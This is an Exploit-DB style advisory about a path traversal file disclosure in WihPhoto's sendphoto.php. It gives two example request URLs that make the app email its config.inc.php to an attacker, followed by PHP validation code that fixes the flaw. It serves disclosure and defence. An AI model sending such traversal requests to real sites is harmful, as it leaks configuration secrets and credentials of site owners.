WihPhoto 0.86 dev - 'sendphoto.php' File Disclosure

EDB-ID: 22282
Author: frog
Type: webapps
Platform: PHP
Date: 2003-02-24

source: https://www.securityfocus.com/bid/6929/info

A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.

An attacker can exploit this vulnerability by specifying arbitrary files as the values of these parameters. This causes WihPhoto to send an email with the attacker-specified file as an attachment.


http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1
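
The parameter verification the advisory says is missing, sketched as a path check that runs before anything is attached to the email. This is an added example, not WihPhoto's code: the function name `resolve_photo`, the photo root layout, the extension allowlist and the temporary demo tree are all assumptions.

```php
<?php
// Added example: hypothetical helper, not WihPhoto's own code.
// Maps the album/pic request parameters to a file that must live
// inside the photo root and carry an image extension.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif']; // assumed allowlist

function resolve_photo(string $photoRoot, string $album, string $pic): ?string
{
    // Each parameter must be one plain path component: no "..",
    // no directory separators, no NUL bytes.
    foreach ([$album, $pic] as $part) {
        if ($part === '' || $part === '.' || $part === '..'
            || strpbrk($part, "/\\\0") !== false) {
            return null;
        }
    }

    // Only image types may be attached; config.inc.php stops here.
    $ext = strtolower(pathinfo($pic, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // Canonicalise and confirm containment, which also catches
    // symlinks that point outside the photo root.
    $root = realpath($photoRoot);
    $path = realpath($photoRoot . DIRECTORY_SEPARATOR . $album
                     . DIRECTORY_SEPARATOR . $pic);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo tree: one real photo and a config file one
// level above the photo root, as in the advisory's request.
$base = sys_get_temp_dir() . '/wih_demo_' . bin2hex(random_bytes(4));
mkdir("$base/photos/holiday", 0700, true);
file_put_contents("$base/photos/holiday/beach.jpg", 'img');
file_put_contents("$base/config.inc.php", '<?php // constructed secret');

var_dump(resolve_photo("$base/photos", 'holiday', 'beach.jpg'));
var_dump(resolve_photo("$base/photos", '..', 'config.inc.php'));
```

The component check and the `realpath` containment check are deliberately redundant: the first rejects the request shape shown in the advisory, the second still holds if a later change loosens the first.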